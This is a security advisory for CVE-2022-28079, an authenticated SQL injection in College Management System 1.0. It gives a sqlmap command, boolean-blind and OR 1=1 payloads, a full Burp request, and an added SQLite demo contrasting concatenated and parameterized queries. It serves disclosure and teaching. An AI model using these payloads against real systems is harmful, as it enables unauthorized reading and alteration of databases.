College Management System 1.0 SQL Injection

Source: packetstormsecurity.com (PACKETSTORM:167131)
Author: Eren Gozaydin
Published: May 12, 2022

CVSS v3.1 base score: 8.8 (High)
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
  Attack Vector: Network
  Attack Complexity: Low
  Privileges Required: Low
  User Interaction: None
  Scope: Unchanged
  Confidentiality Impact: High
  Integrity Impact: High
  Availability Impact: High

CVSS v2 base score: 6.5 (Medium)
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P
  Access Vector: Network
  Access Complexity: Low
  Authentication: Single
  Confidentiality Impact: Partial
  Integrity Impact: Partial
  Availability Impact: Partial

```text
# Exploit Title: College Management System - 'course_code' SQL Injection (Authenticated)
# Date: 2022-03-24
# Exploit Author: Eren Gozaydin
# Vendor Homepage: https://code-projects.org/college-management-system-in-php-with-source-code/
# Software Link: https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f
# Version: 1.0
# Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51
# CVE: CVE-2022-28079
# References: https://nvd.nist.gov/vuln/detail/CVE-2022-28079

------------------------------------------------------------------------------------

1. Description:
----------------------

College Management System 1.0 allows SQL injection via the 'course_code' POST
parameter of /College-Management-System/admin/asign-single-student-subjects.php.
The page belongs to the admin area and is reached with an authenticated admin
session (hence PR:L in the CVSS vector). With such a session, an attacker can
compromise the application, read or modify data in its database, or exploit
latent vulnerabilities in the underlying database server.

2. Proof of Concept:
----------------------

In Burp Suite, intercept the POST request that the affected page sends with the
'course_code' parameter and save it as poc.txt. Then run sqlmap against the
saved request to extract data from the database:

sqlmap -r poc.txt --dbms=mysql

3. Example payload:
----------------------

Technique: boolean-based blind
Payload: submit=Press&roll_no=3&course_code=-6093' OR 2121=2121 AND 'ddQQ'='ddQQ

The leading quote closes the string literal the application builds around the
value, the OR/AND expression is evaluated by the database, and the trailing
'ddQQ'='ddQQ re-uses the application's own closing quote so the statement stays
syntactically valid. A true condition (2121=2121) and a false one produce
different responses, which is the signal sqlmap reports as boolean-based blind.

4. Burp Suite request:
----------------------

POST /College-Management-System/admin/asign-single-student-subjects.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 80
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=jhnlvntmv8q4gtgsof9l1f1hhe
Referer: http://localhost/College-Management-System/admin/asign-single-student-subjects.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36

submit=Press&roll_no=3&course_code=Select+Course%27+OR+1%3d1+OR+%27ns%27%3d%27ns
```
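To make the mechanism behind sections 3 and 4 concrete, here is an added example that is not the College Management System's code nor the advisory author's. It emulates the string-concatenated WHERE clause the advisory implies against an in-memory SQLite table, feeds both request bodies from the page through it, shows why a true and a false condition return different result sets (the boolean-based blind signal sqlmap reports), and contrasts a parameterized query that treats the same input as a plain value. The table name `subjects`, its columns, the sample rows and the exact SELECT are assumptions; SQLite stands in for the application's MySQL backend, and the injected expressions evaluate the same way in both.

```python
"""Added example: emulate the query shape behind CVE-2022-28079.

Not the College Management System's code. The table, columns, rows and
the SELECT statement are assumptions; only the two request bodies are
taken from the advisory. SQLite stands in for MySQL here.
"""
import sqlite3
from urllib.parse import parse_qs

# Constructed sample rows (assumed schema, not the real application's).
SUBJECTS = [
    ("CS101", "Intro to Programming"),
    ("CS201", "Data Structures"),
    ("MA110", "Calculus I"),
]

# The two request bodies from the advisory: the payload sqlmap reported
# (already URL-decoded) and the raw body of the Burp Suite request.
SQLMAP_BODY = "submit=Press&roll_no=3&course_code=-6093' OR 2121=2121 AND 'ddQQ'='ddQQ"
BURP_BODY = ("submit=Press&roll_no=3&course_code="
             "Select+Course%27+OR+1%3d1+OR+%27ns%27%3d%27ns")


def make_db():
    """In-memory table standing in for the application's subject list."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE subjects (course_code TEXT PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO subjects VALUES (?, ?)", SUBJECTS)
    return conn


def course_code_from_body(body):
    """URL-decode the form body the way PHP populates $_POST['course_code']."""
    return parse_qs(body, keep_blank_values=True)["course_code"][0]


def lookup_vulnerable(conn, course_code):
    """Assumed vulnerable shape: the value is spliced into the SQL text, so a
    single quote in it ends the string literal and the rest is parsed as SQL."""
    sql = ("SELECT course_code FROM subjects "
           f"WHERE course_code = '{course_code}' ORDER BY course_code")
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, course_code):
    """Hardened shape: the value is bound as a parameter and never parsed as
    SQL, so the same payload simply matches no course code."""
    sql = ("SELECT course_code FROM subjects "
           "WHERE course_code = ? ORDER BY course_code")
    return [row[0] for row in conn.execute(sql, (course_code,))]


def is_boolean_blind_injectable(lookup, conn):
    """The check behind sqlmap's 'boolean-based blind' verdict: send a true and
    a false condition of the same shape; if the responses differ, the condition
    reached the database. The true payload is the one from the advisory, the
    false payload flips its comparison."""
    true_payload = "-6093' OR 2121=2121 AND 'ddQQ'='ddQQ"
    false_payload = "-6093' OR 2121=2122 AND 'ddQQ'='ddQQ"
    return lookup(conn, true_payload) != lookup(conn, false_payload)


if __name__ == "__main__":
    conn = make_db()
    for name, body in (("sqlmap payload", SQLMAP_BODY), ("Burp body", BURP_BODY)):
        value = course_code_from_body(body)
        print(f"{name}: course_code={value!r}")
        print("  concatenated  ->", lookup_vulnerable(conn, value))
        print("  parameterized ->", lookup_parameterized(conn, value))
    print("concatenated injectable? ", is_boolean_blind_injectable(lookup_vulnerable, conn))
    print("parameterized injectable?", is_boolean_blind_injectable(lookup_parameterized, conn))
```

Under the concatenated query both payloads return every row (the quote breaks out of the literal and `OR 2121=2121` / `OR 1=1` is always true), while the false variant returns nothing, so the oracle reports injectable. Under the bound query both payloads return nothing and the oracle reports not injectable. The PHP equivalent of `lookup_parameterized` is a mysqli or PDO prepared statement that binds `$_POST['course_code']` instead of concatenating it.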
